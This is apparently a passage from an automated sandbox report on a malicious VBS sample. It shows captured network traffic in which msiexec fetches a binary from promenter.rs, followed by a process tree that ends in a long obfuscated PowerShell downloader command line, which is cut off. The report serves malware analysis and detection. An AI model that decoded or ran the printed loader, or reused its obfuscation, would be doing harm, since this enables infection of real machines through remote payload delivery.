2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 48 71 55 52 67 49 35 44 61 56 61 71 65 39 77 41 47 66 6f 6e 59 76 36 37 6c 35 6a 73 6c 53 59 69 33 50 75 6b 49 6e 36 61 79 51 49 46 36 7a 61 76 72 37 34 4e 71 47 63 37 6b 54 74 77 36 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHqURgI5DaVaqe9wAGfonYv67l5jslSYi3PukIn6ayQIF6zavr74NqGc7kTtw6
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 76 30 76 37 51 79 5a 6f 78 70 4e 58 58 38 4e 66 5a 53 63 62 79 31 35 76 38 68 38 71 74 79 41 4d 59 53 61 4d 4e 47 55 43 6c 4f 73 77 7a 66 4b 6d 72 48 74 64 68 4c 6c 42 67 58 6e 58 6e 62 36 4b 70 68 4b 58 64 73 72 35 67 53 65 4f 57 71 66 63 56 61 50 4e 6f 41 51 38 67 45 35 56 7a 2f 64 75 36 59 4f 59 32 78 52 47 6a 4b 45 73 42 6a 70 52 73 49 74 46 43 76 6f 68 4b 54 52 4f 7a 68 37 67 32 36 50 66 67 47 50 4b 37 51 4f 2b 35 6a 44 5a 61 64 74 58 57 36 67 73 45 6c 73 66 63 52 58 75 63 69 2f 72 71 59 35 37 2b 74 73 43 45 64 35 43 37 6a 2f 6f 30 78 41 42 33 44 5a 36 4c 2b 6f 4e 62 67 76 35 72 46 51 5a 64 61 70 79 4c 4e 72 53 51 59 34 67 65 47 65 49 41 37 4e 46 46 68 36 41 4f 57 4e 64 54 50 43 31 62 54 6f 69 68 2f 71 48 63 2f 76 62 47 72 55 41 39 42 79 51 56 53 5a Data Ascii: v0v7QyZoxpNXX8NfZScby15v8h8qtyAMYSaMNGUClOswzfKmrHtdhLlBgXnXnb6KphKXdsr5gSeOWqfcVaPNoAQ8gE5Vz/du6YOY2xRGjKEsBjpRsItFCvohKTROzh7g26PfgGPK7QO+5jDZadtXW6gsElsfcRXuci/rqY57+tsCEd5C7j/o0xAB3DZ6L+oNbgv5rFQZdapyLNrSQY4geGeIA7NFFh6AOWNdTPC1bToih/qHc/vbGrUA9ByQVSZ
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 66 6d 6e 75 43 66 51 6d 30 6b 68 31 36 59 50 57 62 52 48 4e 69 30 50 7a 49 51 4d 53 38 52 41 6b 6b 48 37 71 6a 77 51 38 52 37 50 2b 2f 42 30 51 56 6f 41 72 46 43 75 6b 34 59 36 59 56 53 30 42 37 30 6e 74 76 75 4b 6b 33 52 70 6a 64 52 4f 4b 52 44 55 2f 71 61 6c 55 49 44 2f 77 4b 50 4d 4b 64 6c 74 41 36 41 41 49 62 59 71 30 57 6e 4f 35 56 38 64 74 51 4a 64 51 4a 2b 38 36 7a 44 77 46 64 6a 5a 75 46 73 61 39 50 37 6f 66 59 32 6a 53 69 43 4f 32 58 42 41 39 41 48 6c 46 2f 51 4e 45 75 4d 62 63 6c 76 45 46 73 6d 30 52 38 50 49 79 79 47 6f 30 79 2b 67 6f 41 59 57 58 56 65 31 2b 34 61 33 42 52 4e 30 65 54 50 33 51 69 70 6d 4a 73 50 47 63 44 56 47 47 56 6f 36 6e 5a 6e 44 72 61 35 39 77 47 58 58 51 61 77 78 33 49 76 65 38 6f 76 73 4a 2f 56 4a 32 47 57 56 39 31 64 7a Data Ascii: fmnuCfQm0kh16YPWbRHNi0PzIQMS8RAkkH7qjwQ8R7P+/B0QVoArFCuk4Y6YVS0B70ntvuKk3RpjdROKRDU/qalUID/wKPMKdltA6AAIbYq0WnO5V8dtQJdQJ+86zDwFdjZuFsa9P7ofY2jSiCO2XBA9AHlF/QNEuMbclvEFsm0R8PIyyGo0y+goAYWXVe1+4a3BRN0eTP3QipmJsPGcDVGGVo6nZnDra59wGXXQawx3Ive8ovsJ/VJ2GWV91dz
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-10-15 07:15:03 UTC	8000	IN	Data Raw: 72 45 6d 6d 4c 31 70 5a 68 57 48 57 44 70 4e 35 65 77 37 6f 32 65 57 55 2f 37 31 62 54 6e 4f 35 57 30 71 7a 67 4b 53 6e 37 61 35 78 48 35 64 4d 53 2f 50 5a 39 72 2b 74 71 58 65 43 66 79 37 2b 2b 2b 61 36 67 6d 70 6a 71 4e 7a 49 66 64 53 43 50 59 7a 4f 6f 6e 34 75 6f 30 52 63 47 4a 30 63 64 65 55 46 54 2f 59 56 37 6d 62 32 76 55 4f 45 64 65 63 69 61 77 2b 56 37 6d 62 2f 71 73 36 33 50 46 33 4f 49 6e 5a 68 6e 44 52 6c 4a 69 55 63 6c 44 48 66 73 30 6e 49 36 6b 38 35 62 74 53 46 47 33 67 6d 4e 77 6c 4e 6c 53 4f 73 6e 4b 53 51 6f 38 68 31 48 65 4b 30 7a 35 48 2f 6f 48 37 6e 32 57 30 4a 79 64 6d 78 7a 63 30 34 4b 41 66 55 4e 4d 34 59 77 61 30 32 6e 2b 6c 72 78 6f 4f 49 42 72 50 68 72 6e 4e 6c 41 6c 63 31 33 34 4f 70 75 53 53 31 75 46 41 6f 49 45 66 69 71 56 2b Data Ascii: rEmmL1pZhWHWDpN5ew7o2eWU/71bTnO5W0qzgKSn7a5xH5dMS/PZ9r+tqXeCfy7+++a6gmpjqNzIfdSCPYzOon4uo0RcGJ0cdeUFT/YV7mb2vUOEdeciaw+V7mb/qs63PF3OInZhnDRlJiUclDHfs0nI6k85btSFG3gmNwlNlSOsnKSQo8h1HeK0z5H/oH7n2W0Jydmxzc04KAfUNM4Ywa02n+lrxoOIBrPhrnNlAlc134OpuSS1uFAoIEfiqV+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49973	77.105.36.128	443	7460	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-15 07:15:39 UTC	164	OUT	GET /XWpZCkLt231.bin HTTP/1.1 User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: promenter.rs Cache-Control: no-cache
2024-10-15 07:15:39 UTC	257	IN	HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 07:15:39 GMT Server: Apache Last-Modified: Mon, 14 Oct 2024 09:59:56 GMT Accept-Ranges: bytes Content-Length: 287296 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: application/octet-stream
2024-10-15 07:15:39 UTC	7935	IN	Data Raw: e0 97 2d 23 35 8a 6b ba cf 89 4e c8 e6 da a4 28 73 6b 0b be 7c 26 07 88 ae d6 a2 58 55 ab 73 76 1e 20 96 14 a2 71 4d 96 fa 39 85 cf 22 00 62 da 33 11 5e 59 49 82 44 84 aa 34 0b 74 14 b7 1c 9e 82 0c 69 c6 9b 55 69 4a 08 35 69 6b 85 33 2b 86 08 fc f7 8b e0 aa 2d 97 f4 ec 8e 43 80 81 0a 9a 59 b3 b4 b1 5d 25 7d aa 75 e7 21 53 e0 a9 83 c9 1a 87 44 b4 12 47 a4 a0 4f e4 cd 22 e3 6f 02 07 9d 99 7a 19 ed 19 de 0f d0 8c f9 25 6e 80 37 9c 35 bc 89 c7 f4 21 66 44 97 a3 e1 78 ab 3b b2 0a 5b dc b2 b7 87 61 9f 3d 21 7e f0 3f 6b 35 94 5b 18 8a e8 4d a1 a7 25 d1 9f 20 20 f7 f5 3b 1e 21 17 9e 4a 79 cf e1 93 25 8c 3a 57 6f 93 28 21 3a 15 c1 66 3e 10 80 b2 d9 39 0a ab 58 21 d3 29 0c af 19 c2 5f 6a 9b 88 d7 5b aa ef 60 27 dd f9 de 8b eb 43 bd c6 4c 00 f4 f4 0b 1f fa f0 09 2c Data Ascii: -#5kN(sk\|&XUsv qM9"b3^YID4tiUiJ5ik3+-CY]%}u!SDGO"oz%n75!fDx;[a=!~?k5[M% ;!Jy%:Wo(!:f>9X!)_j[`'CL,
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: 5d 2c d1 36 e5 6e db 37 78 b7 f3 bb 05 e0 2c 53 df 56 b2 27 52 3a 70 73 76 0c 00 9a e8 40 15 28 2e a5 b8 37 1f 95 8f ae af 22 00 81 ac b8 d9 c0 be cf 70 cd 40 11 cb ef b5 0a 8c 16 54 ed 78 81 3a a5 2d d0 81 61 ee 1a 40 3e 8a 83 66 8c 66 a9 d5 ed cb a1 36 ba e5 ad 06 0d 97 aa 9a 4c ee ce 3b 62 e1 8b f4 92 08 83 6b 9d 7e e0 25 24 24 e9 a5 e9 e6 61 1f 19 0a 2a 05 85 df cd c7 52 6d 88 09 65 03 91 1a 29 23 32 0c 57 73 25 92 77 e9 6f 51 66 f0 7d 6e c9 c7 85 80 b5 cb aa c0 7f f6 fa a2 20 55 64 31 17 a9 23 87 a8 78 55 04 23 f2 6e 80 cc 54 10 0a 35 14 fe 64 98 9e 8f d2 98 93 8f 8d 8f 5b dd 8b 83 f8 28 70 a0 ff fe 6b b1 fb d6 86 69 22 b1 61 99 07 ec fe d8 78 43 5b 81 0e 94 f8 65 4a 41 46 21 82 93 5f 28 39 21 c6 ba 09 59 6a e9 65 a1 b3 5e 36 62 5c 33 55 6d ee 45 c9 Data Ascii: ],6n7x,SV'R:psv@(.7"p@Tx:-a@>ff6L;bk~%$$a*Rme)#2Ws%woQf}n Ud1#xU#nT5d[(pki"axC[eJAF!_(9!Yje^6b\3UmE
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: 49 50 e6 ef d7 e5 5c 8b 40 18 67 ac f3 ff ad 59 99 9a 6b 6b 2b e7 92 1d 79 4c a3 31 92 2d 39 f7 79 f7 fb e4 42 10 a2 7b e0 93 36 c2 cd 96 82 23 70 a2 38 1c 45 9c 1a 6f 3e c7 7c 37 5d fb 6b c4 5e 8a 62 f2 a7 0d 9c a5 37 b5 52 66 a7 01 12 26 de e3 86 af b0 0a e4 32 5b 66 56 04 11 2a 1b 06 62 8c 2f fd 12 9c f0 57 32 d1 0d cb 55 60 9c 67 3e 03 10 d0 bd fe 64 5c e3 7a 2d 9e f3 43 08 f8 7e 43 db a5 0a 0b b1 20 06 17 eb ce f2 13 6b 71 60 23 1e ed 0b 98 c2 3a 5e c5 ed 2b 69 dd c2 35 2f 5a 98 a2 f8 36 b8 3e ec 10 8e 17 e8 1a 80 5f 7d e9 e5 1c cc a2 44 9f fe fc c1 5d 47 6a 1d fb a3 43 f5 66 69 79 fc 0a 3e 28 d8 95 cb ad 14 02 c1 e0 72 71 53 ae 1b 45 48 8d 7d 8e 47 4a c7 9d c9 ec d4 4a 6c 0c 01 52 43 f2 3e 7f 64 91 06 39 a8 e5 f1 e0 67 88 7e ce 03 b0 ac a2 ea 7f a4 Data Ascii: IP\@gYkk+yL1-9yB{6#p8Eo>\|7]k^b7Rf&2[fV*b/W2U`g>d\z-C~C kq`#:^+i5/Z6>_}D]GjCfiy>(rqSEH}GJJlRC>d9g~
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: 9f 4e ba 90 32 ba 52 86 f3 95 61 d9 5d 6d df d2 7c 30 a8 eb ff 64 36 bb 28 62 a7 9c a8 cb 2d 68 b8 f2 16 1a c0 fd ce a6 14 de 5f c1 b4 4a 24 a2 ad 0a 04 d5 fd af 70 4a fe c8 c6 95 4e 02 23 98 2e 49 56 b0 6f 21 12 0c c5 3d 18 52 a6 2a e7 d2 c4 44 4b ad a0 e4 97 a4 a3 63 1d 1f cc 35 69 c0 0d 40 0e e2 91 43 e7 a8 83 24 b0 05 32 4e 0b 3b 63 fc c4 47 50 0e 00 6e 84 3f 00 7b 0a 19 83 2c 26 93 3a 01 49 9e 86 58 65 3c 58 89 60 98 53 79 3d ce fc 37 68 cc 15 72 7a a8 fa 88 19 dc a8 ac 0b f3 aa 61 de 09 fb 74 a6 51 9b fc ab 97 07 62 c8 2c db 95 fd 29 1c a0 92 03 b9 59 59 32 05 9e e2 6f 4b ea eb f5 cb 3f ce 0a 75 fb 4e 6e 66 33 4d bd 3b e3 e9 b4 cb 9e e4 55 5a f9 5a e5 90 99 7b 35 26 cc 60 6c 37 0e 87 0d 9b 15 0e c8 a8 72 7f 20 57 39 44 83 4a ef d2 bd c5 de 5f 13 8a Data Ascii: N2Ra]m\|0d6(b-h_J$pJN#.IVo!=R*DKc5i@C$2N;cGPn?{,&:IXe<X`Sy=7hrzatQb,)YY2oK?uNnf3M;UZZ{5&`l7r W9DJ_
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: d5 14 a9 88 5f ff 2d fd 4d 95 84 72 9c 4a 11 b4 fb 32 78 76 e1 64 16 b1 1a e8 24 6a 1d 7a 4c 32 ef 56 d7 d8 4d 1e dd 6d 8b e5 95 23 43 76 c4 7e 07 1d 29 1b ea 4f 69 7a 94 76 9d c0 21 5d 65 c6 90 c5 03 98 4c c8 a4 56 43 59 5d 31 3b be 3f 32 6f b4 94 1e 73 05 b0 c2 d2 cd c5 f0 0d da 7a fa 5b 4c ed 6c bd b5 df 65 91 6f 5d 94 99 13 43 bb cd 3b a2 fb 21 55 2a cf 22 26 64 e7 7e ce a6 3e eb 05 dd a2 12 69 01 38 22 ff 7f 02 a2 e2 9f 58 15 c0 55 ff 00 78 dc e6 3d ac d0 90 c7 e7 6b ed 3e 71 fc a4 1d 6d 18 d6 af e9 ed 99 9b 59 29 97 bc a4 3b 6d 4b f9 dc e9 3e 30 46 39 b0 f5 98 66 2f e7 31 28 98 fa a5 3d 96 24 59 25 7e 22 bd 30 31 b0 8a 92 b7 61 12 19 2c c5 25 9c 58 63 66 bc b3 a7 9a a8 a8 28 04 eb 9a ea cf b1 c6 82 11 18 2f 49 ec bb 07 dd 1d 73 98 11 47 3a 54 ad 24 Data Ascii: _-MrJ2xvd$jzL2VMm#Cv~)Oizv!]eLVCY]1;?2osz[Lleo]C;!U*"&d~>i8"XUx=k>qmY);mK>0F9f/1(=$Y%~"01a,%Xcf(/IsG:T$
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: 20 a3 42 f7 5f ba b4 ff 7d 35 9f b3 a8 22 d7 6b 72 8b 88 db d2 1f bc 90 59 ad 0e 28 bf a6 18 d4 58 00 fc e9 ce 7e 96 62 7f f3 7d 62 0c 92 a2 cb 6e 05 d2 71 60 82 09 39 5f f0 c7 de 3d ad e8 90 41 48 d9 ca a6 ca 4d 00 bc a3 1f 0e cb 5b 55 1b e0 78 22 19 a0 8d 57 8f f6 d3 88 6e 71 5f 42 b9 ca 9c d0 a9 88 f3 bd ab 88 9a 02 7a e1 dd 01 ac b7 e0 dc cc a8 e5 e4 cb 99 e7 98 39 10 8c 4b 77 8d fd 38 98 2a 59 65 fd 77 eb 23 de b9 2b cf 22 09 36 61 68 27 0d 2a f4 7f 0b 4b 27 d8 34 64 c3 9e 96 04 52 8a ac 58 58 12 2d 96 69 7c a4 c3 9f 89 78 a7 93 e3 cf e1 7e 57 f2 03 a9 7d 6e 27 c6 0f 03 e0 9b 37 f4 39 89 18 d7 80 7b 92 32 92 8a cd cf 47 56 37 32 20 3d 09 1a e4 93 85 92 b0 42 e3 d6 bf b6 a5 7d 02 14 3c 3a 8e 5c b2 ed c6 80 4d f7 02 ea db 1f a5 b9 ed 57 86 f3 ae cb 9f Data Ascii: B_}5"krY(X~b}bnq`9_=AHM[Ux"Wnq_Bz9Kw8Yew#+"6ah'K'4dRXX-i\|x~W}n'79{2GV72 =B}<:\MW
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: 0e 7f 57 e0 3b 28 30 27 d5 bf d7 7a d0 f3 85 bd f3 6c ec 91 7f 10 e1 cf 7f ce 2c 05 92 be c0 79 dd 5a 6c 39 2e 25 8e 15 63 86 55 f6 c1 38 0f cc 48 2f a4 44 34 79 45 b1 80 d1 97 c5 70 e4 b1 1f 16 ff 6c ce 72 8a 0f ff 2b 17 47 a9 c0 3a 5c c1 37 d2 b7 2d b4 8a b2 d4 d1 88 26 e2 7d 32 b9 9f 59 dd 05 7a 17 8c 14 f1 53 00 c2 24 0a d4 63 a0 f1 5d 0e 1a 5d bd cd fb 7f ea b3 39 68 35 64 de 38 07 ee ce 25 aa 2c 10 26 e9 3f d2 ff 06 33 36 99 87 dc a6 76 08 83 2a 99 1d ba 72 0b 74 a5 f3 f1 f8 06 a2 67 88 44 96 c3 dc 4c b3 9f c3 d7 8d fa 43 80 10 a4 b8 7b 74 61 57 a5 1b 47 a9 2d 66 6f 01 b3 7b c5 16 3d 29 d3 0c a0 ad ff 0f 43 7f 4d b3 cf 49 9c e2 05 8f 29 0a 99 04 bd ca 22 34 9b 95 4c 0e af bb b1 12 fb 25 2f 84 89 e3 66 14 a5 8d f9 ec e9 f2 bf af 15 5c 7b e8 92 77 9f Data Ascii: W;(0'zl,yZl9.%cU8H/D4yEplr+G:\7-&}2YzS$c]]9h5d8%,&?36v*rtgDLC{taWG-fo{=)CMI)"4L%/f\{w
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: cd 0f 69 9d 16 71 73 7b 10 3a 46 ef c0 db 7c 91 b6 27 15 5a 3b af 24 56 c9 6c c3 ba 25 2f 68 86 54 48 c3 72 20 9f 24 2f 93 0b ac 9a b7 65 33 a5 ee 5d 92 48 db b9 26 44 85 bf e1 63 85 3b 9b 83 83 1e b5 86 b8 aa 8b a2 61 65 b8 29 bb a2 09 c8 5c 5f e0 af 8f b6 d0 66 e2 d6 dd 3e 00 ee e6 09 05 60 3d 1d 72 dd 3d 6c fd 3d 1a cc 2e af 70 32 4c be ad f7 93 81 c6 bf 34 2f 4d 63 6b 8d 96 b9 18 00 79 0a db 93 ea 34 57 40 3e 26 a3 1f 98 62 0b 13 a5 dd 9a 9a b7 e1 7e 69 4d 00 a4 d5 f4 fe 48 b3 1f c0 9a eb 6d 6e 56 65 ee 29 c0 1c 3e 77 0b 2f 4e 99 6a 85 5a 74 bc 35 cf 3b 4d 2a ec 9c 7a 2a 8b b7 42 fb d7 44 d2 60 01 8d 81 b5 50 9a 38 3c 0b d5 e6 95 2b 9a 42 e5 2b e9 bd 7c 86 31 34 22 89 18 6d 67 de 5d 85 ca af 6d 92 3e 6f 14 8e df 45 47 d2 53 09 ef 63 cb 2c 54 8e 10 5b Data Ascii: iqs{:F\|'Z;$Vl%/hTHr $/e3]H&Dc;ae)\_f>`=r=l=.p2L4/Mcky4W@>&b~iMHmnVe)>w/NjZt5;MzBD`P8<+B+\|14"mg]m>oEGSc,T[
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: 64 9d a8 e2 06 a6 3d 2e ea fe ac b7 63 d4 a7 d8 fd 91 1f 71 0a 11 f0 32 54 3c 7c 95 2d fe 74 16 52 9c 25 eb 5f c9 4a 78 3b 24 15 86 25 7a 6a ef d0 5c 61 01 59 1f 87 56 00 91 8e 47 de 27 f6 f3 c3 e4 73 ee c1 c3 1b 9f 41 d7 f8 6d 1c 79 db 7f e2 a1 33 7d a4 58 3e 03 93 70 df 5b 1e 56 c5 53 a4 8f a6 62 6f a0 b6 cb 99 88 7c ea a7 88 ef a3 9c 27 76 4c be 68 ad 91 e7 b2 74 a7 db dc 4c 52 95 3f 91 e1 f8 cb 55 89 83 a1 8e c2 2b 99 65 06 27 8d a9 2d d8 d1 80 aa aa c5 f2 1c 4f f8 5d 70 b5 8c d9 16 21 9f 6b e6 af 07 16 b9 5f 84 59 6d 00 2a 1a e6 98 79 0e 11 79 94 bb a4 0d 33 8b 28 cc da 7f 41 1c b1 f2 17 f9 65 16 0c 7a 7e 9c ec 89 90 09 7e a6 f7 3b ce cb b7 e0 0a 63 77 b9 32 53 5f c2 4a d5 0f 7b 27 a8 2b d1 0d d2 bb be 7e 28 f4 b2 fb d9 4f b5 82 c2 31 2b 9b 12 66 84 Data Ascii: d=.cq2T<\|-tR%_Jx;$%zj\aYVG'sAmy3}X>p[VSbo\|'vLhtLR?U+e'-O]p!k_Ym*yy3(Aez~~;cw2S_J{'+~(O1+f
2024-10-15 07:15:39 UTC	8000	IN	Data Raw: 60 61 3b 31 69 e2 93 7b 7c ab dc f1 cc 7e b6 4b 49 e0 07 b6 56 f3 9f 51 6c 76 59 0f 1b 18 e2 26 67 77 8b db f6 e8 de a2 91 71 88 4a a7 19 aa 07 24 06 3c a7 c5 9a 9e 92 3f a9 b9 f3 1d 52 26 9e 29 96 ef 96 6d 9c 73 5e 61 ac b4 47 ae af 86 d1 ee fb bf 55 51 b0 d0 77 5f 9b 56 ca 19 12 df 38 c1 a8 6f f5 fc 14 ee 62 61 ee 04 26 e0 7c 49 b9 60 28 b7 66 0e eb 50 54 d6 8e 68 43 ba 65 3e 71 69 f1 9d 92 6e 63 a9 2d 35 cc 4b b4 bc ea bc bc 52 a7 39 0c 10 a3 7d 84 1f de 5b bd 19 f1 a8 0c 94 a8 d6 5d 31 02 bf eb e6 b2 37 3b 7b d8 fb 5c de 9c de 1e 63 01 cd 00 32 c1 a1 bc c4 b2 a6 98 01 a4 48 56 82 ba d6 bd 1b 9d af 86 8e e7 1c 27 bf 96 ca dd a0 8a 47 b6 af ac a9 43 20 df cb 85 98 30 db 3e ca c4 db 57 bb 45 61 38 ec 9a 1c 59 df 2f e8 52 7f 67 9b 16 67 ea 33 29 22 42 7b Data Ascii: `a;1i{\|~KIVQlvY&gwqJ$<?R&)ms^aGUQw_V8oba&\|I`(fPThCe>qinc-5KR9}[]17;{\c2HV'GC 0>WEa8Y/Rgg3)"B{

Target ID:	0
Start time:	03:14:56
Start date:	15/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10145202485.vbs"
Imagebase:	0x7ff704350000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:14:57
Start date:	15/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c ping aszzzw_6777.6777.6777.677e
Imagebase:	0x7ff6633b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:14:57
Start date:	15/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:14:57
Start date:	15/10/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping aszzzw_6777.6777.6777.677e
Imagebase:	0x7ff7a1980000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:14:57
Start date:	15/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Hjemmebagerier Semicontradiction Anelser Raadgivningsvirksomheds #>;$Amtskonger='Galopperende';<#Lgknoldet Squiddle Hypozeuxis Prkeners #>;$Klasselotteriernes=$Argand+$host.UI;If ($Klasselotteriernes) {$Spionkamera++;}function Wirepullers($Whiniest){$Hyperscrupulous=$Synchronizable+$Whiniest.'Length'-$Spionkamera; for( $Alvearies210=4;$Alvearies210 -lt $Hyperscrupulous;$Alvearies210+=5){$Paasyningens++;$Fideikommiserne+=$Whiniest[$Alvearies210];$Milanesisk='Besprinkles';}$Fideikommiserne;}function Baggrundsfarve102($Effektivere){ . ($Schoolgirlism) ($Effektivere);}$Cedertrs=Wirepullers 'UnquMPigho Ef z,keai HanlMasklflueaQuer/ C,n ';$Cedertrs+=Wirepullers 'Simu5Saa..Inte0Pat. odou(Pe pWN,uri P.onAnded,ratoSpurwHy ds .de fedeNJenkTGavm Fold1Dig 0Buen.F.cu0 Fly;Urra ParaWBe iiI fonEs.e6Fris4Hver;Zyg Vidux unn6Mult4Svul;Iiis CnidrPretvYode:F.mi1Unsc3H,an1Duff.Stup0stjd) Geo Str.GAnkeet,enc StokTideoRing/ Sk 2 Nat0Svi.1Prop0Rub,0Hypa1 Ku 0Back1Sla OplaFForuiSterrPateeknu,fElisoDemoxfr m/Endu1Nuth3Ucsu1Comp.Ek p0 El, ';$Pladevenderne=Wirepullers 'Imm UGenls MicE HesRb,ma-NdtraCitrGusure Ko NParaTU,pr ';$Dekagrammet=Wirepullers 'Unphh EfttR,fetThorp plsvari: Kon/Spli/CanupBalerOmsloHelimCa aeInstnFinatBaadeCeylrKrum. R irTimesKvar/ MaaD Disi fgapnoyaoHus dPar,iBetadB li.SkvhpAflnfP.anmBelo ';$Forslagenes37=Wirepullers ' ste>Se p ';$Schoolgirlism=Wirepullers ' ChiiBukoePrutX.riz ';$almengr='Bredendes';$Effektfuldes146='\Stderes.Ide';Baggrundsfarve102 (Wirepullers ' nsa$FromG Ny LB.flo,arrBG staInfelTeks: amacHopehmun aphysI onRGentlsveji KroFBl kTProc=regi$Pr,dEProtNRa gv Udk: ShaaStatp ecaPMav D S.gAFrokt K iASubt+Per,$KardeLiddfUns FDiffELng.KBostTUncoFSl kUSkydLBou.dT aneNondsNoto1Felt4M re6Sera ');Baggrundsfarve102 (Wirepullers ' Shi$ButlGVestlSupeoVerdBUrsta PrelBoom:Blgecvivao Hexw,ageATrylGoutbEComp=Su v$Grild Pr eVeneKFjenacruigSig,RzygoAH.anmPopumUntee U mtT,ls.Frems antpAstrLSortIUnvotSyrm(Byge$StatfKvivO MetRUn.wsZelolBoylAHallG SalES senw beeTjekSChae3Conf7Temp)Sovs ');Baggrundsfarve102 (Wirepullers 'Blnd[mononKommEDy.aTIne .LedeS NorEUncoRSkndv PotICurrCForgEPseupcytooAflbiSpannSp,ntB abmIngeaUnbeN PokANakeGStile aurrSmok]Infi:plec:EquisTandE.ngecV,diUCyliR ChaIApplTTilsYAminP Urkrstiko VerTDeltODemic,olyoAlliLFrie K or=Lill Thu[ Endn A.cE Mu tSing.Spi,S,frie Ya CLsegUForsR W ni racTHalvY SynPHhv rfudgoBurrtLandoi tecSch,oHydrL,peet G nYhercpTricEDo,a]D ne:Van :aflytMr,el FnisAtte1 ,er2Unde ');$Dekagrammet=$Cowage[0];$Metrernes=(Wirepullers ' Ned$Va.dgDr mLP ago agsb DadAkinolOb i: KraEWhipDD ruIAid TBullePokerhe,veF,isS oxe= Geon deleUnplW C m-NyopoUn.xb OpsjNon eUncoCSpanT kuf H emS IndySpilSStiftSokkeRonnm skl.Vi iN,hooeGo dt Sej.Forhw PekEReawbR viCPhallSev,IGruseLew nMonsTFour 